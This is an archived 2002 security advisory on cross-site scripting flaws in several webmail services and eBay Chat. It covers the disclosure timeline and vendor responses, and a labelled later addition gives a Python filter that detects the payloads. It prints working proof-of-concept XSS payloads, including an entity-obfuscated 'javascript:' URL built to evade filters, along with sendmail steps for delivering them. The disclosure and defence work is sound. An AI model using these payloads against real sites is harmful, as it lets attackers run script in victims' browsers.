Public Vulnerability Reports

Cross-Site Scripting Vulnerabilities in Popular Web Applications

08.19.02

BACKGROUND

Many web applications generate dynamic HTML web pages using user-submitted data and other sources of "untrusted content." Web applications that do not meticulously filter this untrusted content before presenting the web page to the user may allow the manipulation of the web page and of how a web browser interprets its content. This issue becomes dangerous when untrusted content can be inserted into a dynamic HTML web page via a web application or other means, causing the content to execute potentially malicious code within a user's browser with the same privileges as the legitimate web server.

DESCRIPTION

Some web applications, such as Yahoo! Mail among others, already meticulously filter incoming untrusted data before the content reaches their users. However, given the loose interpretation of HTML, JavaScript, VBScript, etc. by various web browsers, obfuscated content may elude the current filters and execute within the user's browser environment, thereby allowing an attacker to target users almost instantly without relying on the user performing any activity other than normal usage. All vulnerabilities affect web browsers created by Microsoft Corp. or Netscape Communications Corp. These types of XSS vulnerabilities are usually classified as "constant-state", as they persist for more than just one HTTP request. More detailed XSS exploitation scenarios are described in an iDEFENSE paper available at http://www.idefense.com/XSS.html.

ANALYSIS

Yahoo! Mail

The following XSS vulnerability only affected Netscape 4.x browsers (see Vendor Response; Yahoo! has since addressed this issue):

bash$ sendmail -t target@yahoo.com

Paste the following email message
--------------------------------------------------
MIME-Version: 1.0
From: Attack <attacker@foo.com>
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
Subject: XSS Attack

<HTML><BODY>

<ILAYER SRC="script.js"></ILAYER>


</BODY></HTML>
.
--------------------------------------------------

Netscape/AOL Webmail

This XSS vulnerability exists in Netscape Mail (webmail.netscape.com) and AOL Webmail (webmail.aol.com). The following XSS behavior can be triggered in both IE 5.x/6.x and Netscape 4.x:

bash$ sendmail -t target@netscape.net

Paste the following email message
--------------------------------------------------
MIME-Version: 1.0
From: Attack <attacker@foo.com>
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
Subject: XSS Attack

<HTML><BODY>

<IMG SRC="javasc&#X0A;ript:alert('test');">

</BODY></HTML>
.
--------------------------------------------------

Excite Webmail

It would seem that Excite does not perform any filtering of HTML or SCRIPT content whatsoever. The following XSS behavior can be triggered in both IE 5.x/6.x and Netscape 4.x/6.x:

bash$ sendmail -t target@excite.com

Paste the following email message
--------------------------------------------------
MIME-Version: 1.0
From: Attack <attacker@foo.com>
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
Subject: XSS Attack

<HTML><BODY>

<SCRIPT>alert(document.domain);</SCRIPT>

</BODY></HTML>
.
--------------------------------------------------

eBay Chat

While logged in as an eBay user, place the text string below in the chat text field and click submit. The message will appear in the main chat window and will execute in the browser of any user who reads it. The following XSS behavior can be triggered in both IE 5.x/6.x and Netscape 4.x:

---- XSS String ------------------------------------
<IMG SRC="javasc&#X0A;ript:alert(document.domain);">
----------------------------------------------------
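The filtering failure common to the messages above is that the check runs on the raw attribute text while the browser runs on the decoded text. The following server-side check is added here as an illustration and is not part of the advisory or of any vendor's code: it decodes numeric entities (including the hex newline &#X0A; the payloads rely on), strips the control and whitespace characters Netscape 4.x and IE 5.x/6.x tolerated inside a URL scheme, and only then inspects the scheme, while also flagging the active-content tags shown in the samples. The tag and scheme lists are an assumed policy, and the sample bodies are reconstructed from the advisory's own messages.

```python
import html
import re

# Bytes that Netscape 4.x and IE 5.x/6.x tolerated inside a URL scheme: the
# advisory's payload hides a newline (&#X0A;) in "javascript:" so that a filter
# matching the literal string before decoding never sees it.
_CTRL_WS = re.compile(r"[\x00-\x20\x7f]")
_TAG = re.compile(r"<\s*(/?)\s*([a-z][a-z0-9]*)([^>]*)>", re.I | re.S)
_URL_ATTR = re.compile(r"\b(?:src|href)\s*=\s*(?:\"([^\"]*)\"|'([^']*)'|([^\s>]+))", re.I)

# Assumed policy (not stated in the advisory): tags that carry active content,
# and the only schemes allowed in SRC/HREF attributes of untrusted HTML.
ACTIVE_TAGS = {"script", "ilayer", "layer", "iframe", "object", "embed"}
ALLOWED_SCHEMES = {"http", "https"}

def canonical_url(value: str) -> str:
    """Decode entities (twice, to catch double encoding), drop control bytes, lowercase."""
    decoded = html.unescape(html.unescape(value))
    return _CTRL_WS.sub("", decoded).lower()

def url_scheme(value: str) -> str:
    """Scheme of an attribute value after canonicalization; '' for a relative URL."""
    m = re.match(r"([a-z][a-z0-9+.-]*):", canonical_url(value))
    return m.group(1) if m else ""

def find_active_content(body: str) -> list:
    """Return (tag, reason) findings for an untrusted HTML body; [] means clean."""
    findings = []
    for tag in _TAG.finditer(body):
        closing, name, attrs = tag.group(1), tag.group(2).lower(), tag.group(3)
        if closing:
            continue
        if name in ACTIVE_TAGS:
            findings.append((name, "active tag"))
        for attr in _URL_ATTR.finditer(attrs):
            raw = next(g for g in attr.groups() if g is not None)
            scheme = url_scheme(raw)
            if scheme and scheme not in ALLOWED_SCHEMES:
                findings.append((name, f"{scheme}: URL"))
    return findings

# Constructed samples reproducing the message bodies shown in the advisory,
# plus one benign message that must pass.
SAMPLES = {
    "yahoo_netscape4": '<HTML><BODY><ILAYER SRC="script.js"></ILAYER></BODY></HTML>',
    "netscape_aol": '<HTML><BODY><IMG SRC="javasc&#X0A;ript:alert(\'test\');"></BODY></HTML>',
    "excite": '<HTML><BODY><SCRIPT>alert(document.domain);</SCRIPT></BODY></HTML>',
    "benign": '<HTML><BODY><IMG SRC="http://example.com/logo.gif"></BODY></HTML>',
}
```

A filter that compared the raw attribute against "javascript:" would pass the Netscape/AOL and eBay strings; canonicalizing first is what makes the check match what the browser actually executes.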

DETECTION

The following are affected:

Yahoo! Mail http://mail.yahoo.com
Netscape Mail http://webmail.netscape.com
AOL Webmail http://webmail.aol.com (same as Netscape Mail)
Excite Mail http://mail.excite.com
eBay Chat http://pages.ebay.com/community/chat/index.html

WORKAROUND

No workaround is available as of this writing.

VENDOR RESPONSE

On July 16, 2002, Scott Renfro (scottr@yahoo-inc.com), who goes by the title "Paranoid Yahoo," said that the issue was fixed in Yahoo! Mail.

CVE INFORMATION

The Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project did not assign identification numbers to these issues.

DISCLOSURE TIMELINE

06/27/2002 Issue disclosed to iDEFENSE
07/16/2002 Ebay, AOL/Netscape, Yahoo, and Excite notified
07/16/2002 iDEFENSE clients notified
08/11/2002 Second notice given to Excite, AOL/Netscape, and eBay through web customer service suggestion systems
08/19/2002 Still no response from Excite, AOL/Netscape, or eBay
08/19/2002 iDEFENSE released public advisory

CREDIT

Jeremiah Grossman (jeremiah@whitehatsec.com) and Lex Arquette (lex@whitehatsec.com) of WhiteHat Security Inc. are credited with discovering these bugs.